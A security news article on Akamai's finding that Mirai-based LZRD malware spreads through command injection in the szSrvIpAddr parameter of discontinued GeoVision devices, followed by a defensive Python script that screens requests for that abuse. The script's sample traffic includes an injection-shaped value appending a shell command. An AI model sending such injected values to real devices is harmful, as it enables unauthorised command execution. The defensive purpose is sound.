
The Akamai Security Intelligence and Response Team (SIRT) has identified active exploitation of two command injection vulnerabilities — CVE-2024-6047 and CVE-2024-11120 — in discontinued GeoVision IoT devices. According to Akamai, this marks “the first reported active exploitation of these vulnerabilities since the initial disclosure in June 2024 and November 2024, respectively.”
The attackers are targeting the /DateSetting.cgi endpoint in vulnerable GeoVision devices, injecting malicious commands via the szSrvIpAddr parameter. These flaws enable unauthenticated remote attackers to execute arbitrary system commands.
Akamai explains: “Certain discontinued GeoVision devices fail to properly filter user input for this parameter, which allows unauthenticated remote attackers to inject and execute arbitrary system commands on a target system.”
Once exploited, the devices are forced to download and run a Mirai-based malware variant dubbed LZRD, sourced from a malicious URL:
The payload execution string is tailored for ARM-based devices and is injected via a crafted HTTP POST request.
Upon execution, the malware prints a unique console string to the victim machine — a calling card of the LZRD variant. Akamai researchers also observed a series of attack functions consistent with Mirai’s lineage, including:
- sym.attack_method_tcp
- sym.attack_udp_plain
- sym.attack_method_ovh
- sym.attack_method_stdhex
Additionally, analysts discovered a hardcoded command-and-control (C2) IP address within the malware’s sym.resolve_cnc_addr() function. This infrastructure included banners eerily similar to those seen in past campaigns, notably the InfectedSlurs botnet.
The LZRD-powered botnet doesn’t stop at GeoVision devices. Akamai’s honeypots recorded attempts to exploit several other known vulnerabilities, including:
- A Hadoop YARN vulnerability
- CVE-2018-10561 (ZTE ZXV10 H108L Router)
- A DigiEver IoT flaw previously reported by Akamai
One such payload attempted to fetch and run a script from:
To aid defenders, Akamai has included indicators of compromise (IOCs) in their full report and urges organizations to:
- Retire or isolate outdated IoT devices.
- Monitor network traffic for anomalous connections to known C2 IPs.
- Block known malicious endpoints, including hiddenbin/boatnet.arm7 and associated domains.
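As an added illustration of the monitoring advice above (this is not Akamai's code or part of the report), the screening check below treats the szSrvIpAddr parameter of /DateSetting.cgi as what it should be, a time-server IPv4 address or hostname, and flags any request where it is anything else; the request records are constructed, and the function and regex names are my own.

```python
"""Screen requests to GeoVision /DateSetting.cgi for szSrvIpAddr abuse.

A server-address field should only ever hold an IPv4 address or a hostname,
so validating the value positively catches injection attempts without
maintaining a list of shell metacharacters. Added example; all sample
requests are constructed for illustration.
"""
import ipaddress
import re
from urllib.parse import parse_qs

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, 253 characters overall.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

def is_plausible_server_address(value: str) -> bool:
    """True only for a dotted-quad IPv4 address or a syntactically valid hostname."""
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        pass
    return bool(HOSTNAME_RE.match(value))

def inspect_request(method: str, path: str, body: str) -> dict:
    """Classify one HTTP request (method, path with optional query, form body)."""
    url_path, _, query = path.partition("?")
    if url_path != "/DateSetting.cgi":
        return {"verdict": "ignore", "reason": "not the targeted endpoint"}
    # Parameters may arrive in the query string or the POST body; check both.
    params = parse_qs(query + "&" + body, keep_blank_values=True)
    values = params.get("szSrvIpAddr", [])
    for value in values:
        if not is_plausible_server_address(value):
            return {"verdict": "block", "method": method,
                    "reason": "szSrvIpAddr is not an IP address or hostname",
                    "value": value}
    return {"verdict": "allow", "reason": "szSrvIpAddr absent or well-formed"}

# Constructed sample traffic: two legitimate NTP settings, one injection-shaped
# value (an address followed by a shell separator), one unrelated request.
SAMPLE_REQUESTS = [
    ("POST", "/DateSetting.cgi", "szSrvIpAddr=pool.ntp.org&szTimeZone=UTC"),
    ("POST", "/DateSetting.cgi", "szSrvIpAddr=192.168.1.10"),
    ("POST", "/DateSetting.cgi", "szSrvIpAddr=1.1.1.1%3Bid"),
    ("GET", "/index.html", ""),
]

def scan(requests=SAMPLE_REQUESTS) -> list:
    """Return the verdict for each request, in order."""
    return [inspect_request(m, p, b)["verdict"] for m, p, b in requests]
```

A GET carrying the parameter in the query string is screened the same way, since the endpoint, not the method, is what matters for the device.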